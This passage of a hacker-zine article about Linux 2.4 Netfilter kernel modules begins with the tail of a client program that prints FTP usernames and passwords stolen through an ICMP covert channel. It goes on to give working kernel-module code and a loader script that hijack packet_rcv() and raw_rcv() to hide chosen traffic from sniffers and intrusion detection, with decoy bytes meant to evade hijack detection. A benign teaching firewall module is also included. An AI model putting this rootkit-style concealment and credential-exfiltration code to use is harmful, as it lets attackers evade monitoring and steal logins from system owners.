reply...\n"); if (recvfrom(icmp_sock, recvbuff, 256, 0, (struct sockaddr *)&src, &src_addr_size) < 0) { fprintf(stdout, "Failed getting reply packet! %s\n", strerror(errno)); close(icmp_sock); exit(1); } iphead = (struct ip *)recvbuff; icmphead = (struct icmp *)(recvbuff + sizeof(struct ip)); memcpy(&serv_addr, ((char *)icmphead + 8), sizeof (struct in_addr)); fprintf(stdout, "Stolen for ftp server %s:\n", inet_ntoa(serv_addr)); fprintf(stdout, "Username: %s\n", (char *)((char *)icmphead + 12)); fprintf(stdout, "Password: %s\n", (char *)((char *)icmphead + 28)); close(icmp_sock); return 0; } /* Checksum-generation function. It appears that PING'ed machines don't * reply to PINGs with invalid (ie. empty) ICMP Checksum fields... * Fair enough I guess. */ static unsigned short checksum(int numwords, unsigned short *buff) { unsigned long sum; for(sum = 0;numwords > 0;numwords--) sum += *buff++; /* add next word, then increment pointer */ sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); return ~sum; } <--> --[ 6 - Hiding network traffic from Libpcap This section will briefly describe how the Linux 2.4 kernel can be hacked to make network traffic that matches predefined conditions invisible to packet sniffing software running on the local machine. Presented at the end of this article is working code that will do such a thing for all IPv4 traffic coming from or going to a particular IP address. So let's get started shall we... ----[ 6.1 - SOCK_PACKET, SOCK_RAW and Libpcap Some of the most useful software for a system administrator is that which can be classified under the broad title of "packet sniffer". Two of the most common examples of general purpose packet sniffers are tcpdump(1) and Ethereal(1). Both of these applications utilise the Libpcap library (available from [1] along with tcpdump) to capture raw packets. Network Intrusion Detection Systems (NIDS) also make use of the Libpcap library. SNORT requires Libpcap, as does Libnids, a NIDS writing library that provides IP reassembly and TCP stream following and is available from [2]. On Linux systems, the Libpcap library uses the SOCK_PACKET interface. Packet sockets are special sockets that can be used to send and receive raw packets at the link layer. There is a lot that can be said about packet sockets and their use. However, because this section is about hiding from them and not using them, the interested reader is directed to the packet(7) man page. For the discussion here, it is only neccessary to understand that packet sockets are what Libpcap applications use to get the information on raw packets coming into or going out of the machine. When a packet is received by the kernel's network stack, a check is performed to see if there are any packet sockets that would be interested in this packet. If there are then the packet is delivered to those interested sockets. If not, the packet simply continues on it's way to the TCP, UDP or other socket type that it's truly bound for. The same thing happens for sockets of type SOCK_RAW. Raw sockets are very similar to packet sockets, except they do not provide link layer headers. An example of a utility that utilises raw IP sockets is my SYNalert utility, available at [3] (sorry about the shameless plug there :). So now you should see that packet sniffing software on Linux uses the Libpcap library. Libpcap utilises the packet socket interface to obtain raw packets with link layers on Linux systems. Raw sockets were also mentioned which act as a way for user space applications to obtain packets complete with IP headers. The next section will discuss how an LKM can be used to hide network traffic from these packet and raw socket interfaces. ------[ 6.2 Wrapping the cloak around the dagger When a packet is received and sent to a packet socket, the packet_rcv() function is called. This function can be found in net/packet/af_packet.c. packet_rcv() is responsible for running the packet through any socket filters that may be applied to the destination socket and then the ultimate delivery of the packet to user space. To hide packets from a packet socket we need to prevent packet_rcv() from being called at all for certain packets. How do we do this? With good ol'-fashioned function hijacking of course. The basic operation of function hijacking is that if we know the address of a kernel function, even one that's not exported, we can redirect that function to another location before we allow the real code to run. To do this we first save so many of the original instruction bytes from the beginning of the function and replace them with instruction bytes that perform an absolute jump to our own code. Example i386 assembler to do this is given here: movl (address of our function), %eax jmp *eax The generated hex bytes of these instructions (substituting zero as our function address) are: 0xb8 0x00 0x00 0x00 0x00 0xff 0xe0 If in the initialisation of an LKM we change the function address of zero in the code above to that of our hook function, we can make our hook function run first. When (if) we want to run the original function we simply restore the original bytes at the beginning, call the function and then replace our hijacking code. Simple, but powerful. Silvio Cesare has written a document a while ago detailing kernel function hijacking. See [4] in the references. Now to hide packets from packet sockets we need to first write the hook function that will check to see if a packet matches our criteria to be hidden. If it does, then our hook function simply returns zero to it's caller and packet_rcv() never gets called. If packet_rcv() never gets called, then the packet is never delivered to the user space packet socket. Note that it is only the *packet* socket that this packet will be dropped on. If we want to filter FTP packets from being sent to packet sockets then the FTP server's TCP socket will still see the packet. All that we've done is made that packet invisible to any sniffer software that may be running on the host. The FTP server will still be able to process and log the connection. In theory that's all there is too it. The same thing can be done for raw sockets as well. The difference is that we need to hook the raw_rcv() function (net/ipv4/raw.c). The next section will present and discuss source code for an example LKM that will hijack the packet_rcv() and raw_rcv() functions and hide any packets going to or coming from an IP address that we specify. --[ 7 - Conclusion Hopefully by now you have at least a basic understanding of what Netfilter is, how to use it and what you can do with it. You should also have the knowledge to hide special network traffic from sniffing software running on the local machine.If you would like a tarball of the sources used for this tutorial then just email me. I would also appreciate any corrections, comments or suggestions. Now I leave it to you and your imagination to do something interesting with what I have presented here. --[ A - Light-Weight Fire Wall ----[ A.1 - Overview The Light-Weight Fire Wall (LWFW) is a simple kernel module that demonstrates the basic packet filtering techniques that were presented in section 4.LWFW also provides a control interface through the ioctl() system call. Because the LWFW source is sufficiently documented I will only provide a brief overview of how it works. When the LWFW module is installed its first task is to try and register the control device. Note that before the ioctl() interface to LWFW can be used, a character device file needs to be made in /dev. If the control device registration succeeds the "in use" marker is cleared and the hook function for NF_IP_PRE_ROUTE is registered. The clean-up function simply does the reverse of this process. LWFW provides three basic options for dropping packets. These are, in the order of processing: -- Source interface -- Source IP address -- Destination TCP port The specifics of these rules are set with the ioctl() interface. When a packet is received LWFW will check it against all the rules which have been set. If it matches any of the rules then the hook function will return NF_DROP and Netfilter will silently drop the packet. Otherwise the hook function will return NF_ACCEPT and the packet will continue on its way. The last thing worth mentioning is LWFW's statistics logging. Whenever a packet comes into the hook function and LWFW is active the total number of packets seen is incremented. The individual rules checking functions are responsible for incrementing their respective count of dropped packets. Note that when a rule's value is changed its count of dropped packets is reset to zero. The lwfwstats program utilises the LWFW_GET_STATS IOCTL to get a copy of the statistics structure and display it's contents. ----[ A.2 - The source... lwfw.c <++> lwfw/lwfw.c /* Light-weight Fire Wall. Simple firewall utility based on * Netfilter for 2.4. Designed for educational purposes. * * Written by bioforge - March 2003. */ #define MODULE #define __KERNEL__ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "lwfw.h" /* Local function prototypes */ static int set_if_rule(char *name); static int set_ip_rule(unsigned int ip); static int set_port_rule(unsigned short port); static int check_ip_packet(struct sk_buff *skb); static int check_tcp_packet(struct sk_buff *skb); static int copy_stats(struct lwfw_stats *statbuff); /* Some function prototypes to be used by lwfw_fops below. */ static int lwfw_ioctl(struct inode *inode, struct file *file, unsigned int cmd, unsigned long arg); static int lwfw_open(struct inode *inode, struct file *file); static int lwfw_release(struct inode *inode, struct file *file); /* Various flags used by the module */ /* This flag makes sure that only one instance of the lwfw device * can be in use at any one time. */ static int lwfw_ctrl_in_use = 0; /* This flag marks whether LWFW should actually attempt rule checking. * If this is zero then LWFW automatically allows all packets. */ static int active = 0; /* Specifies options for the LWFW module */ static unsigned int lwfw_options = (LWFW_IF_DENY_ACTIVE | LWFW_IP_DENY_ACTIVE | LWFW_PORT_DENY_ACTIVE); static int major = 0; /* Control device major number */ /* This struct will describe our hook procedure. */ struct nf_hook_ops nfkiller; /* Module statistics structure */ static struct lwfw_stats lwfw_statistics = {0, 0, 0, 0, 0}; /* Actual rule 'definitions'. */ /* TODO: One day LWFW might actually support many simultaneous rules. * Just as soon as I figure out the list_head mechanism... */ static char *deny_if = NULL; /* Interface to deny */ static unsigned int deny_ip = 0x00000000; /* IP address to deny */ static unsigned short deny_port = 0x0000; /* TCP port to deny */ /* * This is the interface device's file_operations structure */ struct file_operations lwfw_fops = { NULL, NULL, NULL, NULL, NULL, NULL, lwfw_ioctl, NULL, lwfw_open, NULL, lwfw_release, NULL /* Will be NULL'ed from here... */ }; MODULE_AUTHOR("bioforge"); MODULE_DESCRIPTION("Light-Weight Firewall for Linux 2.4"); /* * This is the function that will be called by the hook */ unsigned int lwfw_hookfn(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)) { unsigned int ret = NF_ACCEPT; /* If LWFW is not currently active, immediately return ACCEPT */ if (!active) return NF_ACCEPT; lwfw_statistics.total_seen++; /* Check the interface rule first */ if (deny_if && DENY_IF_ACTIVE) { if (strcmp(in->name, deny_if) == 0) { /* Deny this interface */ lwfw_statistics.if_dropped++; lwfw_statistics.total_dropped++; return NF_DROP; } } /* Check the IP address rule */ if (deny_ip && DENY_IP_ACTIVE) { ret = check_ip_packet(*skb); if (ret != NF_ACCEPT) return ret; } /* Finally, check the TCP port rule */ if (deny_port && DENY_PORT_ACTIVE) { ret = check_tcp_packet(*skb); if (ret != NF_ACCEPT) return ret; } return NF_ACCEPT; /* We are happy to keep the packet */ } /* Function to copy the LWFW statistics to a userspace buffer */ static int copy_stats(struct lwfw_stats *statbuff) { NULL_CHECK(statbuff); copy_to_user(statbuff, &lwfw_statistics, sizeof(struct lwfw_stats)); return 0; } /* Function that compares a received TCP packet's destination port * with the port specified in the Port Deny Rule. If a processing * error occurs, NF_ACCEPT will be returned so that the packet is * not lost. */ static int check_tcp_packet(struct sk_buff *skb) { /* Seperately defined pointers to header structures are used * to access the TCP fields because it seems that the so-called * transport header from skb is the same as its network header TCP packets. * If you don't believe me then print the addresses of skb->nh.iph * and skb->h.th. * It would have been nicer if the network header only was IP and * the transport header was TCP but what can you do? */ struct tcphdr *thead; /* We don't want any NULL pointers in the chain to the TCP header. */ if (!skb ) return NF_ACCEPT; if (!(skb->nh.iph)) return NF_ACCEPT; /* Be sure this is a TCP packet first */ if (skb->nh.iph->protocol != IPPROTO_TCP) { return NF_ACCEPT; } thead = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4)); /* Now check the destination port */ if ((thead->dest) == deny_port) { /* Update statistics */ lwfw_statistics.total_dropped++; lwfw_statistics.tcp_dropped++; return NF_DROP; } return NF_ACCEPT; } /* Function that compares a received IPv4 packet's source address * with the address specified in the IP Deny Rule. If a processing * error occurs, NF_ACCEPT will be returned so that the packet is * not lost. */ static int check_ip_packet(struct sk_buff *skb) { /* We don't want any NULL pointers in the chain to the IP header. */ if (!skb ) return NF_ACCEPT; if (!(skb->nh.iph)) return NF_ACCEPT; if (skb->nh.iph->saddr == deny_ip) {/* Matches the address. Barf. */ lwfw_statistics.ip_dropped++; /* Update the statistics */ lwfw_statistics.total_dropped++; return NF_DROP; } return NF_ACCEPT; } static int set_if_rule(char *name) { int ret = 0; char *if_dup; /* Duplicate interface */ /* Make sure the name is non-null */ NULL_CHECK(name); /* Free any previously saved interface name */ if (deny_if) { kfree(deny_if); deny_if = NULL; } if ((if_dup = kmalloc(strlen((char *)name) + 1, GFP_KERNEL)) == NULL) { ret = -ENOMEM; } else { memset(if_dup, 0x00, strlen((char *)name) + 1); memcpy(if_dup, (char *)name, strlen((char *)name)); } deny_if = if_dup; lwfw_statistics.if_dropped = 0; /* Reset drop count for IF rule */ printk("LWFW: Set to deny from interface: %s\n", deny_if); return ret; } static int set_ip_rule(unsigned int ip) { deny_ip = ip; lwfw_statistics.ip_dropped = 0; /* Reset drop count for IP rule */ printk("LWFW: Set to deny from IP address: %d.%d.%d.%d\n", ip & 0x000000FF, (ip & 0x0000FF00) >> 8, (ip & 0x00FF0000) >> 16, (ip & 0xFF000000) >> 24); return 0; } static int set_port_rule(unsigned short port) { deny_port = port; lwfw_statistics.tcp_dropped = 0; /* Reset drop count for TCP rule */ printk("LWFW: Set to deny for TCP port: %d\n", ((port & 0xFF00) >> 8 | (port & 0x00FF) << 8)); return 0; } /*********************************************/ /* * File operations functions for control device */ static int lwfw_ioctl(struct inode *inode, struct file *file, unsigned int cmd, unsigned long arg) { int ret = 0; switch (cmd) { case LWFW_GET_VERS: return LWFW_VERS; case LWFW_ACTIVATE: { active = 1; printk("LWFW: Activated.\n"); if (!deny_if && !deny_ip && !deny_port) { printk("LWFW: No deny options set.\n"); } break; } case LWFW_DEACTIVATE: { active ^= active; printk("LWFW: Deactivated.\n"); break; } case LWFW_GET_STATS: { ret = copy_stats((struct lwfw_stats *)arg); break; } case LWFW_DENY_IF: { ret = set_if_rule((char *)arg); break; } case LWFW_DENY_IP: { ret = set_ip_rule((unsigned int)arg); break; } case LWFW_DENY_PORT: { ret = set_port_rule((unsigned short)arg); break; } default: ret = -EBADRQC; }; return ret; } /* Called whenever open() is called on the device file */ static int lwfw_open(struct inode *inode, struct file *file) { if (lwfw_ctrl_in_use) { return -EBUSY; } else { MOD_INC_USE_COUNT; lwfw_ctrl_in_use++; return 0; } return 0; } /* Called whenever close() is called on the device file */ static int lwfw_release(struct inode *inode, struct file *file) { lwfw_ctrl_in_use ^= lwfw_ctrl_in_use; MOD_DEC_USE_COUNT; return 0; } /*********************************************/ /* * Module initialisation and cleanup follow... */ int init_module() { /* Register the control device, /dev/lwfw */ SET_MODULE_OWNER(&lwfw_fops); /* Attempt to register the LWFW control device */ if ((major = register_chrdev(LWFW_MAJOR, LWFW_NAME, &lwfw_fops)) < 0) { printk("LWFW: Failed registering control device!\n"); printk("LWFW: Module installation aborted.\n"); return major; } /* Make sure the usage marker for the control device is cleared */ lwfw_ctrl_in_use ^= lwfw_ctrl_in_use; printk("\nLWFW: Control device successfully registered.\n"); /* Now register the network hooks */ nfkiller.hook = lwfw_hookfn; nfkiller.hooknum = NF_IP_PRE_ROUTING; /* First stage hook */ nfkiller.pf = PF_INET; /* IPV4 protocol hook */ nfkiller.priority = NF_IP_PRI_FIRST; /* Hook to come first */ /* And register... */ nf_register_hook(&nfkiller); printk("LWFW: Network hooks successfully installed.\n"); printk("LWFW: Module installation successful.\n"); return 0; } void cleanup_module() { int ret; /* Remove IPV4 hook */ nf_unregister_hook(&nfkiller); /* Now unregister control device */ if ((ret = unregister_chrdev(LWFW_MAJOR, LWFW_NAME)) != 0) { printk("LWFW: Removal of module failed!\n"); } /* If anything was allocated for the deny rules, free it here */ if (deny_if) kfree(deny_if); printk("LWFW: Removal of module successful.\n"); } <--> <++> lwfw/lwfw.h /* Include file for the Light-weight Fire Wall LKM. * * A very simple Netfilter module that drops backets based on either * their incoming interface or source IP address. * * Written by bioforge - March 2003 */ #ifndef __LWFW_INCLUDE__ # define __LWFW_INCLUDE__ /* NOTE: The LWFW_MAJOR symbol is only made available for kernel code. * Userspace code has no business knowing about it. */ # define LWFW_NAME "lwfw" /* Version of LWFW */ # define LWFW_VERS 0x0001 /* 0.1 */ /* Definition of the LWFW_TALKATIVE symbol controls whether LWFW will * print anything with printk(). This is included for debugging purposes. */ #define LWFW_TALKATIVE /* These are the IOCTL codes used for the control device */ #define LWFW_CTRL_SET 0xFEED0000 /* The 0xFEED... prefix is arbitrary */ #define LWFW_GET_VERS 0xFEED0001 /* Get the version of LWFM */ #define LWFW_ACTIVATE 0xFEED0002 #define LWFW_DEACTIVATE 0xFEED0003 #define LWFW_GET_STATS 0xFEED0004 #define LWFW_DENY_IF 0xFEED0005 #define LWFW_DENY_IP 0xFEED0006 #define LWFW_DENY_PORT 0xFEED0007 /* Control flags/Options */ #define LWFW_IF_DENY_ACTIVE 0x00000001 #define LWFW_IP_DENY_ACTIVE 0x00000002 #define LWFW_PORT_DENY_ACTIVE 0x00000004 /* Statistics structure for LWFW. * Note that whenever a rule's condition is changed the related * xxx_dropped field is reset. */ struct lwfw_stats { unsigned int if_dropped; /* Packets dropped by interface rule */ unsigned int ip_dropped; /* Packets dropped by IP addr. rule */ unsigned int tcp_dropped; /* Packets dropped by TCP port rule */ unsigned long total_dropped; /* Total packets dropped */ unsigned long total_seen; /* Total packets seen by filter */ }; /* * From here on is used solely for the actual kernel module */ #ifdef __KERNEL__ # define LWFW_MAJOR 241 /* This exists in the experimental range */ /* This macro is used to prevent dereferencing of NULL pointers. If * a pointer argument is NULL, this will return -EINVAL */ #define NULL_CHECK(ptr) \ if ((ptr) == NULL) return -EINVAL /* Macros for accessing options */ #define DENY_IF_ACTIVE (lwfw_options & LWFW_IF_DENY_ACTIVE) #define DENY_IP_ACTIVE (lwfw_options & LWFW_IP_DENY_ACTIVE) #define DENY_PORT_ACTIVE (lwfw_options & LWFW_PORT_DENY_ACTIVE) #endif /* __KERNEL__ */ #endif <--> <++> lwfw/Makefile CC= egcs CFLAGS= -Wall -O2 OBJS= lwfw.o .c.o: $(CC) -c $< -o $@ $(CFLAGS) all: $(OBJS) clean: rm -rf *.o rm -rf ./*~ <--> --[ B - Code for section 6 Presented here is a simple module that will hijack the packet_rcv() and raw_rcv() functions to hide any packets to or from the IP address we specify. The default IP address is set to 127.0.0.1, but this can be changed by changing the value of the #define IP. Also presented is a bash script that will get the addresses for the required functions from a System.map file and run insmod with these addresses as parameters in the required format. This loader script was written by grem. Originally for my Mod-off project, it was easily modified to suit the module presented here. Thanks again grem. The presented module is proof-of-concept code only and as such, does not have anything in the way of module hiding. It is also important to remember that although this module can hide traffic from a sniffer running on the same host, a sniffer on a different host, but on the same LAN segment will still see the packets. From what is presented in the module, smart readers should have everything they need to design filtering functions to block any kind of packets they need. I have successfully used the technique presented in this text to hide control and information retrieval packets used by my other LKM projects. <++> pcaphide/pcap_block.c /* Kernel hack that will hijack the packet_rcv() function * which is used to pass packets to Libpcap applications * that use PACKET sockets. Also hijacks the raw_rcv() * function. This is used to pass packets to applications * that open RAW sockets. * * Written by bioforge - 30th June, 2003 */ #define MODULE #define __KERNEL__ #include #include #include #include #include #include #include /* For struct ip */ #include /* For ETH_P_IP */ #include /* For PAGE_OFFSET */ /* * IP address to hide 127.0.0.1 in NBO for Intel */ #define IP htonl(0x7F000001) /* Function pointer for original packet_rcv() */ static int (*pr)(struct sk_buff *skb, struct net_device *dev, struct packet_type *pt); MODULE_PARM(pr, "i"); /* Retrieved as insmod parameter */ /* Function pointer for original raw_rcv() */ static int (*rr)(struct sock *sk, struct sk_buff *skb); MODULE_PARM(rr, "i"); /* Spinlock used for the parts where we un/hijack packet_rcv() */ static spinlock_t hijack_lock = SPIN_LOCK_UNLOCKED; /* Helper macros for use with the Hijack spinlock */ #define HIJACK_LOCK spin_lock_irqsave(&hijack_lock, \ sl_flags) #define HIJACK_UNLOCK spin_unlock_irqrestore(&hijack_lock, \ sl_flags) #define CODESIZE 10 /* Original and hijack code buffers. * Note that the hijack code also provides 3 additional * bytes ( inc eax; nop; dec eax ) to try and throw * simple hijack detection techniques that just look for * a move and a jump. */ /* For packet_rcv() */ static unsigned char pr_code[CODESIZE] = "\xb8\x00\x00\x00\x00" "\x40\x90\x48" "\xff\xe0"; static unsigned char pr_orig[CODESIZE]; /* For raw_rcv() */ static unsigned char rr_code[CODESIZE] = "\xb8\x00\x00\x00\x00" "\x40\x90\x48" "\xff\xe0"; static unsigned char rr_orig[CODESIZE]; /* Replacement for packet_rcv(). This is currently setup to hide * all packets with a source or destination IP address that we * specify. */ int hacked_pr(struct sk_buff *skb, struct net_device *dev, struct packet_type *pt) { int sl_flags; /* Flags for spinlock */ int retval; /* Check if this is an IP packet going to or coming from our * hidden IP address. */ if (skb->protocol == htons(ETH_P_IP)) /* IP packet */ if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP) return 0; /* Ignore this packet */ /* Call original */ HIJACK_LOCK; memcpy((char *)pr, pr_orig, CODESIZE); retval = pr(skb, dev, pt); memcpy((char *)pr, pr_code, CODESIZE); HIJACK_UNLOCK; return retval; } /* Replacement for raw_rcv(). This is currently setup to hide * all packets with a source or destination IP address that we * specify. */ int hacked_rr(struct sock *sock, struct sk_buff *skb) { int sl_flags; /* Flags for spinlock */ int retval; /* Check if this is an IP packet going to or coming from our * hidden IP address. */ if (skb->protocol == htons(ETH_P_IP)) /* IP packet */ if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP) return 0; /* Ignore this packet */ /* Call original */ HIJACK_LOCK; memcpy((char *)rr, rr_orig, CODESIZE); retval = rr(sock, skb); memcpy((char *)rr, rr_code, CODESIZE); HIJACK_UNLOCK; return retval; } int init_module() { int sl_flags; /* Flags for spinlock */ /* pr & rr set as module parameters. If zero or < PAGE_OFFSET * (which we treat as the lower bound of kernel memory), then * we will not install the hacks. */ if ((unsigned int)pr == 0 || (unsigned int)pr < PAGE_OFFSET) { printk("Address for packet_rcv() not valid! (%08x)\n", (int)pr); return -1; } if ((unsigned int)rr == 0 || (unsigned int)rr < PAGE_OFFSET) { printk("Address for raw_rcv() not valid! (%08x)\n", (int)rr); return -1; } *(unsigned int *)(pr_code + 1) = (unsigned int)hacked_pr; *(unsigned int *)(rr_code + 1) = (unsigned int)hacked_rr; HIJACK_LOCK; memcpy(pr_orig, (char *)pr, CODESIZE); memcpy((char *)pr, pr_code, CODESIZE); memcpy(rr_orig, (char *)rr, CODESIZE); memcpy((char *)rr, rr_code, CODESIZE); HIJACK_UNLOCK; EXPORT_NO_SYMBOLS; return 0; } void cleanup_module() { int sl_flags; lock_kernel(); HIJACK_LOCK; memcpy((char *)pr, pr_orig, CODESIZE); memcpy((char *)rr, rr_orig, CODESIZE); HIJACK_UNLOCK; unlock_kernel(); } <--> <++> pcaphide/loader.sh #!/bin/sh # Written by grem, 30th June 2003 # Hacked by bioforge, 30th June 2003 if [ "$1" = "" ]; then echo "Use: $0 "; exit; fi MAP="$1" PR=`cat $MAP | grep -w "packet_rcv" | cut -c 1-16` RR=`cat $MAP | grep -w "raw_rcv" | cut -c 1-16` if [ "$PR" = "" ]; then PR="00000000" fi if [ "$RR" = "" ]; then RR="00000000" fi echo "insmod pcap_block.o pr=0x$PR rr=0x$RR" # Now do the actual call to insmod insmod pcap_block.o pr=0x$PR rr=0x$RR <--> <++> pcaphide/Makefile CC= gcc CFLAGS= -Wall -O2 -fomit-frame-pointer INCLUDES= -I/usr/src/linux/include OBJS= pcap_block.o .c.o: $(CC) -c $< -o $@ $(CFLAGS) $(INCLUDES) all: $(OBJS) clean: rm -rf *.o rm -rf ./*~ <--> ------[ References This appendix contains a list of references used in writing this article. [1] The tcpdump group http://www.tcpdump.org [2] The Packet Factory http://www.packetfactory.net [3] My network tools page - http://uqconnect.net/~zzoklan/software/#net_tools [4] Silvio Cesare's Kernel Function Hijacking article http://vx.netlux.org/lib/vsc08.html [5] Man pages for: - raw (7) - packet (7) - tcpdump (1) [6] Linux kernel source files. In particular: - net/packet/af_packet.c (for packet_rcv()) - net/ipv4/raw.c (for raw_rcv()) - net/core/dev.c - net/ipv4/netfilter/* [7] Harald Welte's Journey of a packet through the Linux 2.4 network stack http://gnumonks.org/ftp/pub/doc/packet-journey-2.4.html [8] The Netfilter documentation page http://www.netfilter.org/documentation [9] Phrack 55 - File 12 - http://www.phrack.org/show.php?p=55&a=12 [A] Linux Device Drivers 2nd Ed. by Alessandro Rubini et al. [B] Inside the Linux Packet Filter. A Linux Journal article http://www.linuxjournal.com/article.php?sid=4852 |=[ EOF ]=---------------------------------------------------------------=|